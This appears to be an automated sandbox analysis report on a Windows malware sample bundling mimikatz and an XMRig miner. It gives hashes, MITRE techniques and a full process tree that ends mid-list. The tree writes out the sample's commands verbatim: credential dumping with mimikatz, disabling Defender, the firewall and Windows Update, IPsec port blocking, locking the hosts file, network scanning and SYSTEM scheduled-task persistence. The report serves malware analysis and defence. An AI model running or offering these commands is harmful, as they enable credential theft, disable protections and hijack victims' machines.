mimikatz | 9f94fca9759d7ec255fbdff27d0f375afbda1f946a28794edf5eea920c959f0c

Analysis

max time kernel
4s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
03-01-2025 01:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2025-01-03_fd63685e2a8be6246f4a37a52a2e7d58_hacktools_icedid_mimikatz.exe
Size

8.6MB
MD5

fd63685e2a8be6246f4a37a52a2e7d58
SHA1

0db22cbabe92be188318124e3997cfbef2d2686c
SHA256

9f94fca9759d7ec255fbdff27d0f375afbda1f946a28794edf5eea920c959f0c
SHA512

2e805f4a8a559338c673948dfb6d6fab7fde3c6f35ce1734c0c60adc6ee9f6b1ca10394a1d0b1f72c2d69bb36bc59dbff1d42a133f1b58b0c99fe1663d547071
SSDEEP

196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Score

10^/10

mimikatz xmrig credential_access discovery evasion execution miner upx

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz
Mimikatz family
mimikatz
Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Contacts a large (31350) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
credential_access

LSASS Memory
T1003.001

XMRig Miner payload 11 IoCs

miner

resource	yara_rule
behavioral2/memory/3488-180-0x00007FF6F5150000-0x00007FF6F5270000-memory.dmp	xmrig
behavioral2/memory/3488-185-0x00007FF6F5150000-0x00007FF6F5270000-memory.dmp	xmrig
behavioral2/memory/3488-205-0x00007FF6F5150000-0x00007FF6F5270000-memory.dmp	xmrig
behavioral2/memory/3488-214-0x00007FF6F5150000-0x00007FF6F5270000-memory.dmp	xmrig
behavioral2/memory/3488-227-0x00007FF6F5150000-0x00007FF6F5270000-memory.dmp	xmrig
behavioral2/memory/3488-234-0x00007FF6F5150000-0x00007FF6F5270000-memory.dmp	xmrig
behavioral2/memory/3488-247-0x00007FF6F5150000-0x00007FF6F5270000-memory.dmp	xmrig
behavioral2/memory/3488-497-0x00007FF6F5150000-0x00007FF6F5270000-memory.dmp	xmrig
behavioral2/memory/3488-498-0x00007FF6F5150000-0x00007FF6F5270000-memory.dmp	xmrig
behavioral2/memory/3488-500-0x00007FF6F5150000-0x00007FF6F5270000-memory.dmp	xmrig
behavioral2/memory/3488-755-0x00007FF6F5150000-0x00007FF6F5270000-memory.dmp	xmrig

mimikatz is an open source tool to dump credentials on Windows 5 IoCs

resource	yara_rule
behavioral2/memory/3096-0-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/3096-4-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/files/0x000a000000023b68-7.dat	mimikatz
behavioral2/memory/3816-8-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/4428-137-0x00007FF655C40000-0x00007FF655D2E000-memory.dmp	mimikatz

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	bytszzu.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2476	netsh.exe
4556	netsh.exe

Executes dropped EXE 2 IoCs

pid	Process
3816	bytszzu.exe
2684	bytszzu.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
66	ifconfig.me
67	ifconfig.me

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135

UPX packed file 37 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2712-156-0x00007FF727940000-0x00007FF72799B000-memory.dmp	upx
behavioral2/files/0x0008000000023c2d-157.dat	upx
behavioral2/memory/2712-159-0x00007FF727940000-0x00007FF72799B000-memory.dmp	upx
behavioral2/memory/4428-137-0x00007FF655C40000-0x00007FF655D2E000-memory.dmp	upx
behavioral2/memory/4428-136-0x00007FF655C40000-0x00007FF655D2E000-memory.dmp	upx
behavioral2/files/0x0008000000023c08-135.dat	upx
behavioral2/files/0x0008000000023c2a-164.dat	upx
behavioral2/memory/3488-163-0x00007FF6F5150000-0x00007FF6F5270000-memory.dmp	upx
behavioral2/memory/2268-169-0x00007FF727940000-0x00007FF72799B000-memory.dmp	upx
behavioral2/memory/4612-177-0x00007FF727940000-0x00007FF72799B000-memory.dmp	upx
behavioral2/memory/3488-180-0x00007FF6F5150000-0x00007FF6F5270000-memory.dmp	upx
behavioral2/memory/3532-182-0x00007FF727940000-0x00007FF72799B000-memory.dmp	upx
behavioral2/memory/3488-185-0x00007FF6F5150000-0x00007FF6F5270000-memory.dmp	upx
behavioral2/memory/3696-187-0x00007FF727940000-0x00007FF72799B000-memory.dmp	upx
behavioral2/memory/4216-191-0x00007FF727940000-0x00007FF72799B000-memory.dmp	upx
behavioral2/memory/3632-195-0x00007FF727940000-0x00007FF72799B000-memory.dmp	upx
behavioral2/memory/4480-199-0x00007FF727940000-0x00007FF72799B000-memory.dmp	upx
behavioral2/memory/3572-203-0x00007FF727940000-0x00007FF72799B000-memory.dmp	upx
behavioral2/memory/3488-205-0x00007FF6F5150000-0x00007FF6F5270000-memory.dmp	upx
behavioral2/memory/4548-208-0x00007FF727940000-0x00007FF72799B000-memory.dmp	upx
behavioral2/memory/4796-212-0x00007FF727940000-0x00007FF72799B000-memory.dmp	upx
behavioral2/memory/3488-214-0x00007FF6F5150000-0x00007FF6F5270000-memory.dmp	upx
behavioral2/memory/3220-217-0x00007FF727940000-0x00007FF72799B000-memory.dmp	upx
behavioral2/memory/1036-221-0x00007FF727940000-0x00007FF72799B000-memory.dmp	upx
behavioral2/memory/624-225-0x00007FF727940000-0x00007FF72799B000-memory.dmp	upx
behavioral2/memory/3488-227-0x00007FF6F5150000-0x00007FF6F5270000-memory.dmp	upx
behavioral2/memory/4784-229-0x00007FF727940000-0x00007FF72799B000-memory.dmp	upx
behavioral2/memory/3428-231-0x00007FF727940000-0x00007FF72799B000-memory.dmp	upx
behavioral2/memory/2752-233-0x00007FF727940000-0x00007FF72799B000-memory.dmp	upx
behavioral2/memory/3488-234-0x00007FF6F5150000-0x00007FF6F5270000-memory.dmp	upx
behavioral2/memory/3440-236-0x00007FF727940000-0x00007FF72799B000-memory.dmp	upx
behavioral2/memory/3488-247-0x00007FF6F5150000-0x00007FF6F5270000-memory.dmp	upx
behavioral2/memory/3488-497-0x00007FF6F5150000-0x00007FF6F5270000-memory.dmp	upx
behavioral2/memory/3488-498-0x00007FF6F5150000-0x00007FF6F5270000-memory.dmp	upx
behavioral2/memory/3488-500-0x00007FF6F5150000-0x00007FF6F5270000-memory.dmp	upx
behavioral2/memory/3488-755-0x00007FF6F5150000-0x00007FF6F5270000-memory.dmp	upx
behavioral2/memory/3488-756-0x00007FF6F5150000-0x00007FF6F5270000-memory.dmp	upx

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\nsyinawm\bytszzu.exe	2025-01-03_fd63685e2a8be6246f4a37a52a2e7d58_hacktools_icedid_mimikatz.exe
File opened for modification	C:\Windows\nsyinawm\bytszzu.exe	2025-01-03_fd63685e2a8be6246f4a37a52a2e7d58_hacktools_icedid_mimikatz.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3008	sc.exe
536	sc.exe
1988	sc.exe
2196	sc.exe

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bytszzu.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2025-01-03_fd63685e2a8be6246f4a37a52a2e7d58_hacktools_icedid_mimikatz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bytszzu.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1492	PING.EXE
3372	cmd.exe

NSIS installer 3 IoCs

installer

resource	yara_rule
behavioral2/files/0x000a000000023b68-7.dat	nsis_installer_2
behavioral2/files/0x0031000000023b7f-15.dat	nsis_installer_1
behavioral2/files/0x0031000000023b7f-15.dat	nsis_installer_2

Modifies data under HKEY_USERS 5 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	bytszzu.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	bytszzu.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	bytszzu.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	bytszzu.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	bytszzu.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1492	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3580	schtasks.exe
4772	schtasks.exe
2460	schtasks.exe

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
3096	2025-01-03_fd63685e2a8be6246f4a37a52a2e7d58_hacktools_icedid_mimikatz.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	3096	2025-01-03_fd63685e2a8be6246f4a37a52a2e7d58_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege	3816	bytszzu.exe
Token: SeDebugPrivilege	2684	bytszzu.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
3096	2025-01-03_fd63685e2a8be6246f4a37a52a2e7d58_hacktools_icedid_mimikatz.exe
3096	2025-01-03_fd63685e2a8be6246f4a37a52a2e7d58_hacktools_icedid_mimikatz.exe
3816	bytszzu.exe
3816	bytszzu.exe
2684	bytszzu.exe
2684	bytszzu.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 3096 wrote to memory of 3372	3096	2025-01-03_fd63685e2a8be6246f4a37a52a2e7d58_hacktools_icedid_mimikatz.exe	84
PID 3096 wrote to memory of 3372	3096	2025-01-03_fd63685e2a8be6246f4a37a52a2e7d58_hacktools_icedid_mimikatz.exe	84
PID 3096 wrote to memory of 3372	3096	2025-01-03_fd63685e2a8be6246f4a37a52a2e7d58_hacktools_icedid_mimikatz.exe	84
PID 3372 wrote to memory of 1492	3372	cmd.exe	86
PID 3372 wrote to memory of 1492	3372	cmd.exe	86
PID 3372 wrote to memory of 1492	3372	cmd.exe	86
PID 3372 wrote to memory of 3816	3372	cmd.exe	87
PID 3372 wrote to memory of 3816	3372	cmd.exe	87
PID 3372 wrote to memory of 3816	3372	cmd.exe	87
PID 2684 wrote to memory of 3192	2684	bytszzu.exe	89
PID 2684 wrote to memory of 3192	2684	bytszzu.exe	89
PID 2684 wrote to memory of 3192	2684	bytszzu.exe	89
PID 3192 wrote to memory of 2172	3192	cmd.exe	91
PID 3192 wrote to memory of 2172	3192	cmd.exe	91
PID 3192 wrote to memory of 2172	3192	cmd.exe	91
PID 3192 wrote to memory of 3720	3192	cmd.exe	92
PID 3192 wrote to memory of 3720	3192	cmd.exe	92
PID 3192 wrote to memory of 3720	3192	cmd.exe	92
PID 3192 wrote to memory of 1276	3192	cmd.exe	93
PID 3192 wrote to memory of 1276	3192	cmd.exe	93
PID 3192 wrote to memory of 1276	3192	cmd.exe	93
PID 3192 wrote to memory of 2428	3192	cmd.exe	169
PID 3192 wrote to memory of 2428	3192	cmd.exe	169
PID 3192 wrote to memory of 2428	3192	cmd.exe	169

C:\Users\Admin\AppData\Local\Temp\2025-01-03_fd63685e2a8be6246f4a37a52a2e7d58_hacktools_icedid_mimikatz.exe
"C:\Users\Admin\AppData\Local\Temp\2025-01-03_fd63685e2a8be6246f4a37a52a2e7d58_hacktools_icedid_mimikatz.exe"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3096
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\nsyinawm\bytszzu.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:3372
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:1492
- - C:\Windows\nsyinawm\bytszzu.exe
    C:\Windows\nsyinawm\bytszzu.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:3816

C:\Windows\nsyinawm\bytszzu.exe
C:\Windows\nsyinawm\bytszzu.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2684
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3192
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2172
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3720
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1276
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    PID:2428
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1336
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    PID:3412
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static del all
  2⤵
  PID:3960
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add policy name=Bastards description=FuckingBastards
  2⤵
  PID:2820
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filteraction name=BastardsList action=block
  2⤵
  PID:2400
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\vuqibqfqb\ieymcmqub\wpcap.exe /S
  2⤵
  PID:880
- - C:\Windows\vuqibqfqb\ieymcmqub\wpcap.exe
    C:\Windows\vuqibqfqb\ieymcmqub\wpcap.exe /S
    3⤵
    PID:440
  - - C:\Windows\SysWOW64\net.exe
      net stop "Boundary Meter"
      4⤵
      PID:1352
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Boundary Meter"
        5⤵
        
        PID:3912
  - - C:\Windows\SysWOW64\net.exe
      net stop "TrueSight Meter"
      4⤵
      PID:1548
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "TrueSight Meter"
        5⤵
        
        PID:4720
  - - C:\Windows\SysWOW64\net.exe
      net stop npf
      4⤵
      PID:1092
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop npf
        5⤵
        
        PID:4592
  - - C:\Windows\SysWOW64\net.exe
      net start npf
      4⤵
      PID:4524
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start npf
        5⤵
        
        PID:2672
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  PID:3032
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    PID:1492
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      PID:3128
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  PID:3508
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    PID:3412
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      PID:516
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\vuqibqfqb\ieymcmqub\hbnqbyuem.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\vuqibqfqb\ieymcmqub\Scant.txt
  2⤵
  PID:3964
- - C:\Windows\vuqibqfqb\ieymcmqub\hbnqbyuem.exe
    C:\Windows\vuqibqfqb\ieymcmqub\hbnqbyuem.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\vuqibqfqb\ieymcmqub\Scant.txt
    3⤵
    PID:2560
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\vuqibqfqb\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\vuqibqfqb\Corporate\log.txt
  2⤵
  PID:4112
- - C:\Windows\vuqibqfqb\Corporate\vfshost.exe
    C:\Windows\vuqibqfqb\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
    3⤵
    PID:4428
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "qsyirlhey" /ru system /tr "cmd /c C:\Windows\ime\bytszzu.exe"
  2⤵
  PID:4044
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3440
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "qsyirlhey" /ru system /tr "cmd /c C:\Windows\ime\bytszzu.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3580
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "nabgiiueh" /ru system /tr "cmd /c echo Y|cacls C:\Windows\nsyinawm\bytszzu.exe /p everyone:F"
  2⤵
  PID:1740
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1920
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "nabgiiueh" /ru system /tr "cmd /c echo Y|cacls C:\Windows\nsyinawm\bytszzu.exe /p everyone:F"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4772
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bmefekubb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\swsbcbmeu\bssyne.exe /p everyone:F"
  2⤵
  PID:2228
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3872
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "bmefekubb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\swsbcbmeu\bssyne.exe /p everyone:F"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2460
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  2⤵
  PID:2260
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  2⤵
  PID:3556
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  PID:4244
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  PID:5084
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  2⤵
  PID:2628
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  2⤵
  PID:2484
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  PID:2268
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  PID:4656
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  2⤵
  PID:3032
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  2⤵
  PID:2428
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  PID:1312
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  PID:1564
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop SharedAccess
  2⤵
  PID:1460
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    PID:4952
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SharedAccess
      4⤵
      PID:1668
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh firewall set opmode mode=disable
  2⤵
  PID:1120
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    PID:4556
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh Advfirewall set allprofiles state off
  2⤵
  PID:2292
- - C:\Windows\SysWOW64\netsh.exe
    netsh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:2476
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop MpsSvc
  2⤵
  PID:3604
- - C:\Windows\SysWOW64\net.exe
    net stop MpsSvc
    3⤵
    PID:4428
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MpsSvc
      4⤵
      PID:820
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop WinDefend
  2⤵
  PID:4840
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    PID:1548
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      PID:540
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop wuauserv
  2⤵
  PID:4144
- - C:\Windows\SysWOW64\net.exe
    net stop wuauserv
    3⤵
    PID:4896
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wuauserv
      4⤵
      PID:1640
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config MpsSvc start= disabled
  2⤵
  PID:1784
- - C:\Windows\SysWOW64\sc.exe
    sc config MpsSvc start= disabled
    3⤵
    - Launches sc.exe
    PID:1988
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config SharedAccess start= disabled
  2⤵
  PID:2212
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    - Launches sc.exe
    PID:536
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config WinDefend start= disabled
  2⤵
  PID:212
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    PID:2196
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config wuauserv start= disabled
  2⤵
  PID:2260
- - C:\Windows\SysWOW64\sc.exe
    sc config wuauserv start= disabled
    3⤵
    - Launches sc.exe
    PID:3008
- C:\Windows\TEMP\xohudmc.exe
  C:\Windows\TEMP\xohudmc.exe
  2⤵
  PID:1092
- C:\Windows\TEMP\vuqibqfqb\eybsetuye.exe
  C:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 772 C:\Windows\TEMP\vuqibqfqb\772.dmp
  2⤵
  PID:2712
- C:\Windows\TEMP\vuqibqfqb\eybsetuye.exe
  C:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 380 C:\Windows\TEMP\vuqibqfqb\380.dmp
  2⤵
  PID:2268
- C:\Windows\TEMP\vuqibqfqb\eybsetuye.exe
  C:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 1020 C:\Windows\TEMP\vuqibqfqb\1020.dmp
  2⤵
  PID:4612
- C:\Windows\TEMP\vuqibqfqb\eybsetuye.exe
  C:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 2544 C:\Windows\TEMP\vuqibqfqb\2544.dmp
  2⤵
  PID:3532
- C:\Windows\TEMP\vuqibqfqb\eybsetuye.exe
  C:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 2788 C:\Windows\TEMP\vuqibqfqb\2788.dmp
  2⤵
  PID:3696
- C:\Windows\TEMP\vuqibqfqb\eybsetuye.exe
  C:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 2984 C:\Windows\TEMP\vuqibqfqb\2984.dmp
  2⤵
  PID:4216
- C:\Windows\TEMP\vuqibqfqb\eybsetuye.exe
  C:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 796 C:\Windows\TEMP\vuqibqfqb\796.dmp
  2⤵
  PID:3632
- C:\Windows\TEMP\vuqibqfqb\eybsetuye.exe
  C:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 3800 C:\Windows\TEMP\vuqibqfqb\3800.dmp
  2⤵
  PID:4480
- C:\Windows\TEMP\vuqibqfqb\eybsetuye.exe
  C:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 3900 C:\Windows\TEMP\vuqibqfqb\3900.dmp
  2⤵
  PID:3572
- C:\Windows\TEMP\vuqibqfqb\eybsetuye.exe
  C:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 3968 C:\Windows\TEMP\vuqibqfqb\3968.dmp
  2⤵
  PID:4548
- C:\Windows\TEMP\vuqibqfqb\eybsetuye.exe
  C:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 4056 C:\Windows\TEMP\vuqibqfqb\4056.dmp
  2⤵
  PID:4796
- C:\Windows\TEMP\vuqibqfqb\eybsetuye.exe
  C:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 2936 C:\Windows\TEMP\vuqibqfqb\2936.dmp
  2⤵
  PID:3220
- C:\Windows\TEMP\vuqibqfqb\eybsetuye.exe
  C:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 4088 C:\Windows\TEMP\vuqibqfqb\4088.dmp
  2⤵
  PID:1036
- C:\Windows\TEMP\vuqibqfqb\eybsetuye.exe
  C:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 844 C:\Windows\TEMP\vuqibqfqb\844.dmp
  2⤵
  PID:624
- C:\Windows\TEMP\vuqibqfqb\eybsetuye.exe
  C:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 2124 C:\Windows\TEMP\vuqibqfqb\2124.dmp
  2⤵
  PID:4784
- C:\Windows\TEMP\vuqibqfqb\eybsetuye.exe
  C:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 5020 C:\Windows\TEMP\vuqibqfqb\5020.dmp
  2⤵
  PID:3428
- C:\Windows\TEMP\vuqibqfqb\eybsetuye.exe
  C:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 2448 C:\Windows\TEMP\vuqibqfqb\2448.dmp
  2⤵
  PID:2752
- C:\Windows\TEMP\vuqibqfqb\eybsetuye.exe
